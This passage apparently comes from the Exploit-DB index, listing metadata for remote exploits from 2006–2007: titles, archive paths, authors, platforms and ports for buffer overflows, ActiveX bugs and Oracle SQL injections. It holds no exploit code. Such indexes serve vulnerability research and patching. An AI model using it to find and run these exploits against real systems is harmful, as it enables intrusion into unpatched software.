CanonicalizePathName() Remote (MS06-040)",2006-08-19,Preddy,windows,remote,139 -2233,exploits/windows/remote/2233.c,"Texas Imperial Software WFTPD 3.23 - 'SIZE' Remote Buffer Overflow",2006-08-21,h07,windows,remote,21 -2234,exploits/windows/remote/2234.py,"Easy File Sharing FTP Server 2.0 - 'PASS' Remote (PoC)",2006-08-21,h07,windows,remote,21 -2237,exploits/multiple/remote/2237.sh,"Apache < 1.3.37/2.0.59/2.2.3 mod_rewrite - Remote Overflow",2006-08-21,"Jacobo Avariento",multiple,remote, -2258,exploits/windows/remote/2258.py,"Alt-N MDaemon POP3 Server < 9.06 - 'USER' Remote Heap Overflow",2006-08-26,muts,windows,remote,110 -2265,exploits/windows/remote/2265.c,"Microsoft Windows - NetpIsRemote() Remote Overflow (MS06-040) (2)",2006-08-28,ub3rst4r,windows,remote,445 -2274,exploits/linux/remote/2274.c,"Streamripper 1.61.25 - HTTP Header Parsing Buffer Overflow (1)",2006-08-29,Expanders,linux,remote, -2276,exploits/windows/remote/2276.pm,"IBM eGatherer 3.20.0284.0 - ActiveX Remote Code Execution (Metasploit)",2006-08-29,"Francisco Amato",windows,remote, -2277,exploits/windows/remote/2277.c,"Streamripper 1.61.25 - HTTP Header Parsing Buffer Overflow (2)",2006-08-29,psylocn,windows,remote, -2283,exploits/windows/remote/2283.c,"TIBCO Rendezvous 7.4.11 - add router Remote Buffer Overflow",2006-09-01,"Andres Tarasco",windows,remote, -2320,exploits/windows/remote/2320.txt,"IBM Director < 5.10 - 'Redirect.bat' Directory Traversal",2006-09-07,"Daniel Clemens",windows,remote,411 -2328,exploits/windows/remote/2328.php,"RaidenHTTPD 1.1.49 - 'SoftParserFileXml' Remote Code Execution",2006-09-08,rgod,windows,remote,80 -2345,exploits/windows/remote/2345.pl,"Mercur MailServer 5.0 SP3 - 'IMAP' Remote Buffer Overflow (2)",2006-09-11,"Jacopo Cervini",windows,remote,143 -2355,exploits/windows/remote/2355.pm,"Microsoft Windows Server 2003 - NetpIsRemote() Remote Overflow (MS06-040) (Metasploit)",2006-09-13,"Trirat Puttaraksa",windows,remote,445 -2358,exploits/windows/remote/2358.c,"Microsoft Internet Explorer - COM Object Remote Heap Overflow",2006-09-13,nop,windows,remote, -2401,exploits/windows/remote/2401.c,"Ipswitch WS_FTP LE 5.08 - PASV Response Remote Buffer Overflow",2006-09-20,h07,windows,remote, -2403,exploits/windows/remote/2403.c,"Microsoft Internet Explorer - 'VML' Remote Buffer Overflow",2006-09-20,nop,windows,remote, -2408,exploits/windows/remote/2408.pl,"Microsoft Internet Explorer (Windows XP SP1) - 'VML' Remote Buffer Overflow",2006-09-21,"Trirat Puttaraksa",windows,remote, -2425,exploits/windows/remote/2425.html,"Microsoft Internet Explorer (Windows XP SP2) - 'VML' Remote Buffer Overflow",2006-09-24,jamikazu,windows,remote, -2426,exploits/windows/remote/2426.pl,"Microsoft Internet Explorer - 'VML' Remote Buffer Overflow (SP2) (Perl)",2006-09-25,"Trirat Puttaraksa",windows,remote, -2440,exploits/windows/remote/2440.rb,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (Metasploit) (1)",2006-09-27,"H D Moore",windows,remote, -2445,exploits/windows/remote/2445.c,"NaviCOPA Web Server 2.01 - 'GET' Remote Buffer Overflow",2006-09-27,h07,windows,remote,80 -2448,exploits/windows/remote/2448.html,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() (HTML)",2006-09-28,jamikazu,windows,remote, -2458,exploits/windows/remote/2458.pl,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() (1)",2006-09-29,"YAG KOHHA",windows,remote, -2460,exploits/windows/remote/2460.c,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() (2)",2006-09-29,LukeHack,windows,remote, -2467,exploits/windows/remote/2467.pm,"McAfee ePo 3.5.0 / ProtectionPilot 1.1.0 - Source Remote (Metasploit)",2006-10-01,muts,windows,remote,81 -2482,exploits/windows/remote/2482.pl,"SHTTPD 1.34 - 'POST' Remote Buffer Overflow",2006-10-05,SkOd,windows,remote, -2530,exploits/windows/remote/2530.py,"BulletProof FTP Client 2.45 - Remote Buffer Overflow (PoC)",2006-10-12,h07,windows,remote, -2601,exploits/windows/remote/2601.c,"Ipswitch IMail Server 2006 / 8.x - 'RCPT' Remote Stack Overflow",2006-10-19,"Greg Linares",windows,remote,25 -2637,exploits/windows/remote/2637.c,"AEP SmartGate 4.3b - 'GET' Arbitrary File Download",2006-10-24,prdelka,windows,remote,143 -2638,exploits/hardware/remote/2638.c,"Cisco VPN 3000 Concentrator 4.1.7/4.7.2 - 'FTP' Remote File System Access",2006-10-24,prdelka,hardware,remote, -2649,exploits/windows/remote/2649.c,"QK SMTP 3.01 - 'RCPT TO' Remote Buffer Overflow (1)",2006-10-25,Expanders,windows,remote,25 -2651,exploits/windows/remote/2651.c,"MiniHTTPServer Web Forum & File Sharing Server 4.0 - Add User",2006-10-25,"Greg Linares",windows,remote, -2657,exploits/windows/remote/2657.html,"Microsoft Internet Explorer 7 - Popup Address Bar Spoofing",2006-10-26,anonymous,windows,remote, -2671,exploits/windows/remote/2671.pl,"Novell eDirectory 8.8 - NDS Server Remote Stack Overflow",2006-10-28,FistFuXXer,windows,remote,8028 -2680,exploits/win_x86/remote/2680.pm,"PrivateWire Gateway 3.7 (Windows x86) - Remote Buffer Overflow (Metasploit)",2006-10-29,"Michael Thumann",win_x86,remote,80 -2689,exploits/windows/remote/2689.c,"Novell eDirectory 9.0 - 'DHost' Remote Buffer Overflow",2006-10-30,Expanders,windows,remote, -2690,exploits/windows/remote/2690.c,"Easy File Sharing Web Server 4 - Remote Information Stealer",2006-10-30,"Greg Linares",windows,remote,80 -2699,exploits/windows/remote/2699.c,"EFS Easy Address Book Web Server 1.2 - Remote File Stream",2006-11-01,"Greg Linares",windows,remote, -2729,exploits/windows/remote/2729.pm,"Omni-NFS Server 5.2 - 'nfsd.exe' Remote Stack Overflow (Metasploit)",2006-11-06,"Evgeny Legerov",windows,remote,2049 -2743,exploits/windows/remote/2743.html,"Microsoft Internet Explorer 6/7 - XML Core Services Remote Code Execution (1)",2006-11-08,anonymous,windows,remote, -2749,exploits/windows/remote/2749.html,"Microsoft Internet Explorer 6/7 - XML Core Services Remote Code Execution (2)",2006-11-10,~Fyodor,windows,remote, -2753,exploits/windows/remote/2753.c,"Microsoft Internet Explorer 6/7 - XML Core Services Remote Code Execution (3)",2006-11-10,M03,windows,remote, -2770,exploits/windows/remote/2770.rb,"Broadcom Wireless Driver - Probe Response SSID Overflow (Metasploit)",2006-11-13,"H D Moore",windows,remote, -2771,exploits/windows/remote/2771.rb,"D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit)",2006-11-13,"H D Moore",windows,remote, -2784,exploits/multiple/remote/2784.html,"Links 1.00pre12 - 'smbclient' Remote Code Execution",2006-11-14,"Teemu Salmela",multiple,remote, -2785,exploits/windows/remote/2785.c,"WinZip 10.0.7245 - FileView ActiveX Remote Buffer Overflow",2006-11-15,prdelka,windows,remote, -2789,exploits/windows/remote/2789.cpp,"Microsoft Windows - NetpManageIPCConnect Stack Overflow (MS06-070)",2006-11-16,cocoruder,windows,remote, -2800,exploits/windows/remote/2800.cpp,"Microsoft Windows - Wkssvc NetrJoinDomain2 Stack Overflow (MS06-070)",2006-11-17,"S A Stevens",windows,remote, -2809,exploits/windows/remote/2809.py,"Microsoft Windows - 'NetpManageIPCConnect' Remote Stack Overflow (MS06-070) (Python)",2006-11-18,"Winny Thomas",windows,remote,445 -2837,exploits/multiple/remote/2837.sql,"Oracle 9i/10g - 'read/write/execute' ation Suite",2006-11-23,"Marco Ivaldi",multiple,remote, -2856,exploits/linux/remote/2856.pm,"ProFTPd 1.3.0 - 'sreplace' Remote Stack Overflow (Metasploit)",2006-11-27,"Evgeny Legerov",linux,remote,21 -2858,exploits/linux/remote/2858.c,"Evince Document Viewer - 'DocumentMedia' Remote Buffer Overflow",2006-11-28,K-sPecial,linux,remote, -2865,exploits/windows/remote/2865.rb,"3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Remote Overflow",2006-11-30,cthulhu,windows,remote,69 -2866,exploits/windows/remote/2866.html,"Acer LunchApp.APlunch - ActiveX Control Command Execution",2006-11-30,"Tan Chew Keong",windows,remote, -2870,exploits/windows/remote/2870.rb,"VUPlayer 2.44 - '.m3u' UNC Name Buffer Overflow (Metasploit)",2006-11-30,"Greg Linares",windows,remote, -2887,exploits/windows/remote/2887.pl,"Allied Telesyn TFTP (AT-TFTP) Server/Daemon 1.9 - 'Filename' Remote Buffer Overflow",2006-12-03,"Jacopo Cervini",windows,remote,69 -2933,exploits/linux/remote/2933.c,"OpenLDAP 2.4.3 - 'KBIND' Remote Buffer Overflow",2006-12-15,"Solar Eclipse",linux,remote,389 -2936,exploits/linux/remote/2936.pl,"GNU InetUtils ftpd 1.4.2 - 'ld.so.preload' Remote Code Execution",2006-12-15,kingcope,linux,remote,21 -2951,exploits/multiple/remote/2951.sql,"Oracle 9i/10g - 'extproc' Local/Remote Command Execution",2006-12-19,"Marco Ivaldi",multiple,remote, -2959,exploits/linux/remote/2959.sql,"Oracle 9i/10g - 'utl_file' FileSystem Access",2006-12-19,"Marco Ivaldi",linux,remote, -2974,exploits/windows/remote/2974.pl,"Http explorer Web Server 1.02 - Directory Traversal",2006-12-21,str0ke,windows,remote, -3021,exploits/linux/remote/3021.txt,"ProFTPd 1.2.9 rc2 - '.ASCII' File Remote Code Execution (2)",2003-10-15,"Solar Eclipse",linux,remote,21 -3022,exploits/windows/remote/3022.txt,"Microsoft Windows - ASN.1 Remote (MS04-007)",2004-03-26,"Solar Eclipse",windows,remote,445 -3037,exploits/windows/remote/3037.php,"Durian Web Application Server 3.02 - Remote Buffer Overflow",2006-12-29,rgod,windows,remote,4002 -3055,exploits/windows/remote/3055.html,"WinZip 10.0 - FileView ActiveX Controls Remote Overflow",2006-12-31,XiaoHui,windows,remote, -3058,exploits/windows/remote/3058.html,"Rediff Bol Downloader - ActiveX Control Execute Local File",2006-12-31,"Gregory R. Panakkal",windows,remote, -3063,exploits/windows/remote/3063.pl,"Formbankserver 1.9 - 'Name' Directory Traversal",2007-01-01,Bl0od3r,windows,remote, -3064,exploits/multiple/remote/3064.rb,"Apple QuickTime - 'rtsp URL Handler' Remote Stack Buffer Overflow",2007-01-01,MoAB,multiple,remote, -3067,exploits/windows/remote/3067.txt,"QK SMTP 3.01 - 'RCPT TO' Remote Buffer Overflow (2)",2007-01-01,"Jacopo Cervini",windows,remote,25 -3072,exploits/windows/remote/3072.py,"Apple QuickTime (Windows 2000) - 'rtsp URL Handler' Remote Buffer Overflow",2007-01-03,"Winny Thomas",windows,remote, -3077,exploits/osx/remote/3077.rb,"Apple QuickTime 7.1.3 - 'HREFTrack' Cross-Zone Scripting",2007-01-03,MoAB,osx,remote, -3084,exploits/windows/remote/3084.txt,"Adobe Acrobat Reader Plugin 7.0.x - 'acroreader' Cross-Site Scripting",2007-01-05,"Stefano Di Paola",windows,remote, -3086,exploits/windows/remote/3086.py,"CA BrightStor ARCserve - 'tapeeng.exe' Remote Buffer Overflow",2007-01-05,"Winny Thomas",windows,remote,6502 -3092,exploits/windows/remote/3092.pm,"NaviCOPA Web Server 2.01 - 'GET' Remote Buffer Overflow (Metasploit)",2007-01-07,"Jacopo Cervini",windows,remote,80 -3099,exploits/linux/remote/3099.pm,"Berlios GPSD 2.7 - Remote Format String (Metasploit)",2007-01-08,Enseirb,linux,remote,2947 -3107,exploits/windows/remote/3107.pm,"FileCOPA FTP Server 1.01 - 'LIST' Remote Buffer Overflow (Metasploit)",2007-01-09,"Jacopo Cervini",windows,remote,21 -40404,exploits/php/remote/40404.rb,"Kaltura 11.1.0-2 - Remote Code Execution (Metasploit)",2016-09-21,"Mehmet Ince",php,remote,80 -3132,exploits/windows/remote/3132.pl,"ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow (1)",2007-01-15,"Jacopo Cervini",windows,remote,69 -3133,exploits/windows/remote/3133.pl,"Mercur Messaging 2005 - IMAP Remote Buffer Overflow",2007-01-15,"Jacopo Cervini",windows,remote,143 -3137,exploits/windows/remote/3137.html,"Microsoft Internet Explorer - VML Remote Buffer Overflow (MS07-004)",2007-01-16,LifeAsaGeek,windows,remote, -3140,exploits/windows/remote/3140.pl,"KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow",2007-01-17,UmZ,windows,remote,21 -3148,exploits/windows/remote/3148.pl,"Microsoft Internet Explorer - VML Download and Execute (MS07-004)",2007-01-17,pang0,windows,remote, -3158,exploits/windows/remote/3158.c,"Intel Centrino ipw2200BG - Wireless Driver Remote Overflow (PoC)",2007-01-19,oveRet,windows,remote, -3168,exploits/windows/remote/3168.java,"Sun Microsystems Java - '.GIF' File Parsing Memory Corruption",2007-01-21,luoluo,windows,remote, -3170,exploits/windows/remote/3170.pm,"3Com TFTP Service (3CTftpSvc) 2.0.1 - Remote Buffer Overflow (Metasploit)",2007-01-21,Enseirb,windows,remote,69 -3189,exploits/hardware/remote/3189.sh,"PA168 Chipset IP Phones - Weak Session Management",2007-01-24,"Adrian _pagvac_ Pastor",hardware,remote, -3211,exploits/windows/remote/3211.py,"CA BrightStor ARCserve - 'msgeng.exe' Remote Heap Overflow (1)",2007-01-27,"Winny Thomas",windows,remote,6503 -3218,exploits/windows/remote/3218.pl,"CA BrightStor ARCserve - 'msgeng.exe' Remote Heap Overflow (2)",2007-01-28,"Jacopo Cervini",windows,remote,6503 -3244,exploits/windows/remote/3244.py,"CA BrightStor ARCserve - 'lgserver.exe' Remote Stack Overflow",2007-02-01,"Winny Thomas",windows,remote,1900 -3264,exploits/windows/remote/3264.pl,"Ipswitch IMail Server 8.10-8.12 - RCPT TO Remote Buffer Overflow",2007-02-04,"Jacopo Cervini",windows,remote,25 -3265,exploits/windows/remote/3265.pm,"Ipswitch IMail Server 8.10-8.12 - RCPT TO Remote Buffer Overflow (Metasploit)",2007-02-04,"Jacopo Cervini",windows,remote,25 -3269,exploits/multiple/remote/3269.pl,"Oracle 9i/10g - DBMS_EXPORT_EXTENSION SQL Injection",2007-02-05,bunker,multiple,remote, -3274,exploits/windows/remote/3274.txt,"MySQL 4.x/5.0 (Windows) - User-Defined Function Command Execution",2007-02-06,"Marco Ivaldi",windows,remote,3306 -3279,exploits/windows/remote/3279.html,"Alibaba Alipay - Remove ActiveX Remote Code Execution",2007-02-06,cocoruder,windows,remote, -3291,exploits/windows/remote/3291.pl,"SAP Web Application Server 6.40 - Arbitrary File Disclosure",2007-02-08,Nicob,windows,remote, -3293,exploits/solaris/remote/3293.sh,"SunOS 5.10/5.11 in.TelnetD - Remote Authentication Bypass",2007-02-11,kingcope,solaris,remote,23 -3294,exploits/hardware/remote/3294.txt,"IP3 NetAccess < 4.1.9.6 - Arbitrary File Disclosure",2007-02-11,"Sebastian Wolfgarten",hardware,remote,80 -3296,exploits/windows/remote/3296.c,"uTorrent 1.6 build 474 - 'announce' Key Remote Heap Overflow",2007-02-12,defsec,windows,remote, -3302,exploits/windows/remote/3302.sh,"Lotus Domino R6 Webmail - Remote Password Hash Dumper",2007-02-13,"Marco Ivaldi",windows,remote,80 -3303,exploits/multiple/remote/3303.sh,"Portable OpenSSH 3.6.1p-PAM/4.1-SuSE - Timing Attack",2007-02-13,"Marco Ivaldi",multiple,remote, -3319,exploits/windows/remote/3319.pl,"MailEnable IMAPD Enterprise 2.32 < 2.34 - Remote Buffer Overflow",2007-02-16,mu-b,windows,remote,143 -3320,exploits/windows/remote/3320.pl,"MailEnable IMAPD Professional 2.35 - Remote Buffer Overflow",2007-02-16,mu-b,windows,remote,143 -3329,exploits/linux/remote/3329.c,"Axigen eMail Server 2.0.0b2 - 'pop3' Remote Format String",2007-02-18,fuGich,linux,remote,110 -3335,exploits/windows/remote/3335.pm,"Ipswitch WS_FTP Server 5.05 - XMD5 Remote Buffer Overflow (Metasploit)",2007-02-19,"Jacopo Cervini",windows,remote,21 -3340,exploits/windows/remote/3340.html,"Mozilla Firefox 2.0.0.1 - 'location.hostname' Cross-Domain",2007-02-20,"Michal Zalewski",windows,remote, -3358,exploits/multiple/remote/3358.pl,"Oracle 10g - KUPW$WORKER.MAIN Grant/Revoke dba Permission",2007-02-22,bunker,multiple,remote, -3359,exploits/multiple/remote/3359.pl,"Oracle 10g - KUPV$FT.ATTACH_JOB Grant/Revoke dba Permission",2007-02-22,bunker,multiple,remote, -3363,exploits/multiple/remote/3363.pl,"Oracle 9i/10g - DBMS_METADATA.GET_DDL SQL Injection",2007-02-23,bunker,multiple,remote, -3364,exploits/windows/remote/3364.pl,"Oracle 9i/10g - ACTIVATE_SUBSCRIPTION SQL Injection",2007-02-23,bunker,windows,remote, -3375,exploits/multiple/remote/3375.pl,"Oracle 10g - KUPW$WORKER.MAIN SQL Injection (2)",2007-02-26,bunker,multiple,remote, -3376,exploits/multiple/remote/3376.pl,"Oracle 10g KUPV$FT.ATTACH_JOB - SQL Injection (2)",2007-02-26,bunker,multiple,remote, -3377,exploits/multiple/remote/3377.pl,"Oracle 9i/10g DBMS_METADATA.GET_DDL - SQL Injection (2)",2007-02-26,bunker,multiple,remote, -3378,exploits/multiple/remote/3378.pl,"Oracle 9i/10g ACTIVATE_SUBSCRIPTION - SQL Injection (2)",2007-02-26,bunker,multiple,remote, -3380,exploits/windows/remote/3380.txt,"Kiwi CatTools TFTP 3.2.8 - Directory Traversal",2007-02-27,"Sergey Gordeychik",windows,remote, -3381,exploits/windows/remote/3381.pl,"NetProxy 4.03 - Web Filter Evasion / Bypass Logging",2007-02-27,"Craig Heffner",windows,remote, -3388,exploits/windows/remote/3388.pl,"3Com TFTP Service (3CTftpSvc) 2.0.1 - Long Transporting Mode (Perl)",2007-02-28,"Umesh Wanve",windows,remote,69 -3389,exploits/linux/remote/3389.c,"Madwifi 0.9.2.1 - WPA/RSN IE Remote Kernel Buffer Overflow",2007-03-01,"Massimiliano Oldani",linux,remote, -3391,exploits/windows/remote/3391.py,"Snort 2.6.1 - DCE/RPC Preprocessor Remote Buffer Overflow",2007-03-01,"Trirat Puttaraksa",windows,remote, -3395,exploits/windows/remote/3395.c,"WebMod 0.48 - Content-Length Remote Buffer Overflow (PoC)",2007-03-01,cybermind,windows,remote, -3397,exploits/windows/remote/3397.pl,"MailEnable Professional/Enterprise 2.37 - 'APPEND' Remote Buffer Overflow",2007-03-02,mu-b,windows,remote,143 -3405,exploits/multiple/remote/3405.txt,"PHP 4.4.3 < 4.4.6 - 'PHPinfo()' Cross-Site Scripting",2007-03-04,"Stefan Esser",multiple,remote, -3420,exploits/windows/remote/3420.html,"WinZip 10.0.7245 - FileView ActiveX Buffer Overflow (2)",2007-03-06,prdelka,windows,remote, -3422,exploits/windows/remote/3422.pl,"Winamp 5.12 - '.pls' Remote Buffer Overflow (Perl) (2)",2007-03-07,"Umesh Wanve",windows,remote, -3425,exploits/multiple/remote/3425.txt,"mod_security 2.1.0 - ASCIIZ byte POST Rules Bypass",2007-03-07,"Stefan Esser",multiple,remote, -3452,exploits/multiple/remote/3452.php,"PHP 5.2.0 - EXT/Filter FDF Post Filter Bypass",2007-03-10,"Stefan Esser",multiple,remote, -3462,exploits/windows/remote/3462.cpp,"NewsReactor 20070220 - Article Grabbing Remote Buffer Overflow (1)",2007-03-12,Marsu,windows,remote, -3463,exploits/windows/remote/3463.cpp,"NewsReactor 20070220 - Article Grabbing Remote Buffer Overflow (2)",2007-03-12,Marsu,windows,remote, -3474,exploits/windows/remote/3474.py,"WarFTP 1.65 (Windows 2000 SP4) - 'USER' Remote Buffer Overflow (Python)",2007-03-14,"Winny Thomas",windows,remote,21 -3482,exploits/windows/remote/3482.pl,"WarFTP 1.65 (Windows 2000 SP4) - 'USER' Remote Buffer Overflow (Perl)",2007-03-15,"Umesh Wanve",windows,remote,21 -3491,exploits/bsd/remote/3491.py,"OpenBSD - ICMPv6 Fragment Remote Execution (PoC)",2007-03-15,"Core Security",bsd,remote, -3495,exploits/windows/remote/3495.txt,"CA BrightStor ARCserve - 'msgeng.exe' Remote Stack Overflow",2007-03-16,"Winny Thomas",windows,remote,6503 -3531,exploits/windows/remote/3531.py,"Helix Server 11.0.1 (Windows 2000 SP4) - Remote Heap Overflow",2007-03-21,"Winny Thomas",windows,remote,554 -3537,exploits/windows/remote/3537.py,"Mercur Messaging 2005 (Windows 2000 SP4) - IMAP 'Subscribe' Remote Overflow",2007-03-21,"Winny Thomas",windows,remote,143 -3540,exploits/windows/remote/3540.py,"Mercur Messaging 2005 < SP4 - IMAP Remote (Egghunter)",2007-03-21,muts,windows,remote,143 -3541,exploits/windows/remote/3541.pl,"FutureSoft TFTP Server 2000 - Remote Overwrite (SEH)",2007-03-22,"Umesh Wanve",windows,remote,69 -3544,exploits/windows/remote/3544.c,"Microsoft DNS Server - Dynamic DNS Update/Change",2007-03-22,"Andres Tarasco",windows,remote, -3554,exploits/linux/remote/3554.pm,"dproxy 0.5 - Remote Buffer Overflow (Metasploit)",2007-03-23,"Alexander Klink",linux,remote,53 -3555,exploits/multiple/remote/3555.pl,"Ethernet Device Drivers Frame Padding - 'Etherleak' Infomation Leakage",2007-03-23,"Jon Hart",multiple,remote, -3561,exploits/windows/remote/3561.pl,"Mercury/32 Mail Server 4.0.1 - 'LOGIN' Remote IMAP Stack Buffer Overflow",2007-03-24,"Jacopo Cervini",windows,remote,143 -3570,exploits/windows/remote/3570.c,"WarFTP 1.65 - 'USER' Remote Buffer Overflow",2007-03-25,niXel,windows,remote,21 -3575,exploits/windows/remote/3575.cpp,"Frontbase 4.2.7 (Windows) - Remote Buffer Overflow",2007-03-25,Heretic2,windows,remote, -3577,exploits/windows/remote/3577.html,"Microsoft Internet Explorer - Recordset Double-Free Memory (MS07-009)",2007-03-26,anonymous,windows,remote, -3579,exploits/windows/remote/3579.py,"Easy File Sharing FTP Server 2.0 (Windows 2000 SP4) - 'PASS' Remote Overflow",2007-03-26,"Winny Thomas",windows,remote,21 -3584,exploits/multiple/remote/3584.pl,"Oracle 10g KUPM$MCP.MAIN - SQL Injection (2)",2007-03-27,bunker,multiple,remote, -3585,exploits/multiple/remote/3585.pl,"Oracle 10g - KUPM$MCP.MAIN SQL Injection",2007-03-27,bunker,multiple,remote, -3589,exploits/windows/remote/3589.pm,"NaviCOPA Web Server 2.01 - Remote Buffer Overflow (Metasploit)",2007-03-27,skillTube,windows,remote,80 -3604,exploits/windows/remote/3604.py,"CA BrightStor Backup 11.5.2.0 - 'Mediasvr.exe' Remote Code",2007-03-29,Shirkdog,windows,remote,111 -3609,exploits/linux/remote/3609.py,"Snort 2.6.1 (Linux) - DCE/RPC Preprocessor Remote Buffer Overflow",2007-03-30,"Winny Thomas",linux,remote, -3610,exploits/windows/remote/3610.html,"ActSoft DVD-Tools - 'dvdtools.ocx' Remote Buffer Overflow",2007-03-30,"Umesh Wanve",windows,remote, -3615,exploits/lin_x86/remote/3615.c,"dproxy-nexgen (Linux x86) - Remote Buffer Overflow",2007-03-30,mu-b,lin_x86,remote,53 -3616,exploits/windows/remote/3616.py,"IBM Lotus Domino Server 6.5 - Unauthenticated Remote Overflow",2007-03-31,muts,windows,remote,143 -3627,exploits/windows/remote/3627.c,"IPSwitch IMail Server 8.20 - IMAPD Remote Buffer Overflow",2007-04-01,Heretic2,windows,remote,143 -3634,exploits/windows/remote/3634.txt,"Microsoft Windows XP/Vista - Animated Cursor '.ani' Remote Overflow",2007-04-01,jamikazu,windows,remote, -3635,exploits/windows/remote/3635.txt,"Microsoft Windows XP - Animated Cursor '.ani' Remote Overflow (2)",2007-04-01,"Trirat Puttaraksa",windows,remote, -3636,exploits/windows/remote/3636.txt,"Microsoft Windows - Animated Cursor '.ani' Remote (eeye patch Bypass)",2007-04-01,jamikazu,windows,remote, -3650,exploits/windows/remote/3650.c,"Frontbase 4.2.7 - Authenticated Remote Buffer Overflow (2.2)",2007-04-02,Heretic2,windows,remote, -3651,exploits/windows/remote/3651.txt,"Microsoft Windows - Animated Cursor '.ani' Universal Generator",2007-04-03,"YAG KOHHA",windows,remote, -3654,exploits/multiple/remote/3654.pl,"HP Mercury Quality Center 9.0 build 9.1.0.4352 - SQL Execution",2007-04-03,"Isma Khan",multiple,remote, -3661,exploits/windows/remote/3661.pl,"HP Mercury Quality Center - Spider90.ocx ProgColor Overflow",2007-04-04,ri0t,windows,remote, -3662,exploits/windows/remote/3662.rb,"AOL SuperBuddy - ActiveX Control Remote Code Execution (Metasploit)",2007-04-04,"Krad Chad",windows,remote, -3675,exploits/windows/remote/3675.rb,"FileCOPA FTP Server 1.01 - 'LIST' Remote Buffer Overflow (2)",2007-04-06,"Umesh Wanve",windows,remote,21 -3680,exploits/win_x86/remote/3680.sh,"Apache mod_rewrite (Windows x86) - Off-by-One Remote Overflow",2007-04-07,axis,win_x86,remote,80 -3698,exploits/linux/remote/3698.txt,"Kerberos 1.5.1 - Kadmind Buffer Overflow",2007-04-10,c0ntex,linux,remote, -3708,exploits/multiple/remote/3708.html,"MiniWebsvr 0.0.7 - Remote Directory Traversal",2007-04-11,shinnai,multiple,remote, -3724,exploits/linux/remote/3724.c,"Aircrack-NG 0.7 - 'Specially Crafted 802.11 Packets' Remote Buffer Overflow",2007-04-12,"Jonathan So",linux,remote, -3728,exploits/windows/remote/3728.c,"Microsoft Internet Explorer - NCTAudioFile2.AudioFile ActiveX Remote Overflow",2007-04-13,InTeL,windows,remote, -3737,exploits/windows/remote/3737.py,"Microsoft Windows Server 2000 SP4 - DNS RPC Remote Buffer Overflow",2007-04-15,"Winny Thomas",windows,remote,139 -3738,exploits/windows/remote/3738.php,"XAMPP for Windows 1.6.0a - 'mssql_connect()' Remote Buffer Overflow",2007-04-15,rgod,windows,remote,80 -3740,exploits/windows/remote/3740.c,"Microsoft Windows - DNS DnssrvQuery Remote Stack Overflow",2007-04-15,devcode,windows,remote,139 -3746,exploits/windows/remote/3746.txt,"Microsoft Windows - DNS RPC Remote Buffer Overflow (2)",2007-04-18,"Andres Tarasco",windows,remote,445 -3787,exploits/linux/remote/3787.c,"GNU Mailutils imap4d 0.6 - exec-shield Remote Format String",2007-04-24,Xpl017Elz,linux,remote,143 -3804,exploits/windows/remote/3804.txt,"Microsoft Windows - '.ani' GDI Remote Privilege Escalation (MS07-017)",2007-04-26,"Lionel d'Hauenens",windows,remote, -3808,exploits/windows/remote/3808.html,"Microsoft Internet Explorer - NCTAudioFile2.AudioFile ActiveX Remote Stack Overflow (2)",2007-04-27,shinnai,windows,remote, -3810,exploits/windows/remote/3810.html,"IPIX Image Well - ActiveX 'iPIX-ImageWell-ipix.dll' Remote Buffer Overflow",2007-04-27,"Umesh Wanve",windows,remote, -3815,exploits/linux/remote/3815.c,"Fenice Oms server 1.10 - exec-shield Remote Buffer Overflow",2007-04-29,Xpl017Elz,linux,remote, -3821,exploits/linux/remote/3821.c,"3proxy 0.5.3g (Linux) - 'proxy.c logurl()' Remote Buffer Overflow",2007-04-30,vade79,linux,remote, -3822,exploits/win_x86/remote/3822.c,"3proxy 0.5.3g (Windows x86) - 'proxy.c logurl()' Remote Buffer Overflow",2007-04-30,vade79,win_x86,remote, -3829,exploits/linux/remote/3829.c,"3proxy 0.5.3g - exec-shield 'proxy.c logurl()' Remote Overflow",2007-05-02,Xpl017Elz,linux,remote, -3844,exploits/windows/remote/3844.html,"ActSoft DVD-Tools - 'dvdtools.ocx 3.8.5.0' Remote Stack Overflow",2007-05-04,shinnai,windows,remote, -3872,exploits/windows/remote/3872.html,"Taltech Tal Bar Code - ActiveX Control Buffer Overflow",2007-05-08,"Umesh Wanve",windows,remote, -3877,exploits/windows/remote/3877.html,"IncrediMail IMMenuShellExt - ActiveX Control Buffer Overflow",2007-05-08,"Umesh Wanve",windows,remote, -3880,exploits/windows/remote/3880.html,"Sienzo Digital Music Mentor 2.6.0.4 - SetEvalExpiryDate Overwrite (SEH)",2007-05-09,"Parveen Vashishtha",windows,remote, -3881,exploits/windows/remote/3881.html,"Sienzo Digital Music Mentor 2.6.0.4 - SetEvalExpiryDate EIP Overwrite",2007-05-09,"Parveen Vashishtha",windows,remote, -3882,exploits/windows/remote/3882.html,"Barcodewiz ActiveX Control 2.52 - 'Barcodewiz.dll' Overwrite (SEH)",2007-05-09,"Parveen Vashishtha",windows,remote, -3892,exploits/windows/remote/3892.html,"Microsoft Internet Explorer 7 - Arbitrary File Rewrite (PoC) (MS07-027)",2007-05-10,"Andres Tarasco",windows,remote, -3893,exploits/windows/remote/3893.c,"McAfee Security Center IsOldAppInstalled - ActiveX Buffer Overflow",2007-05-10,Jambalaya,windows,remote, -3899,exploits/windows/remote/3899.html,"Morovia Barcode ActiveX Professional 3.3.1304 - Arbitrary File Overwrite",2007-05-11,shinnai,windows,remote, -3913,exploits/windows/remote/3913.c,"webdesproxy 0.0.1 - GET Remote Buffer Overflow",2007-05-12,vade79,windows,remote,8080 -3916,exploits/windows/remote/3916.php,"VImpX ActiveX (VImpX.ocx 4.7.3.0) - Remote Buffer Overflow",2007-05-13,rgod,windows,remote, -3922,exploits/linux/remote/3922.c,"webdesproxy 0.0.1 - 'exec-shield' GET Remote Code Execution",2007-05-14,Xpl017Elz,linux,remote,8080 -3925,exploits/windows/remote/3925.py,"TinyIdentD 2.2 - Remote Buffer Overflow",2007-05-14,"Thomas Pollet",windows,remote,113 -3927,exploits/windows/remote/3927.html,"DeWizardX - 'DEWizardAX.ocx' Arbitrary File Overwrite",2007-05-15,shinnai,windows,remote, -3934,exploits/windows/remote/3934.py,"Eudora 7.1 - SMTP ResponseRemote Remote Buffer Overflow",2007-05-15,h07,windows,remote, 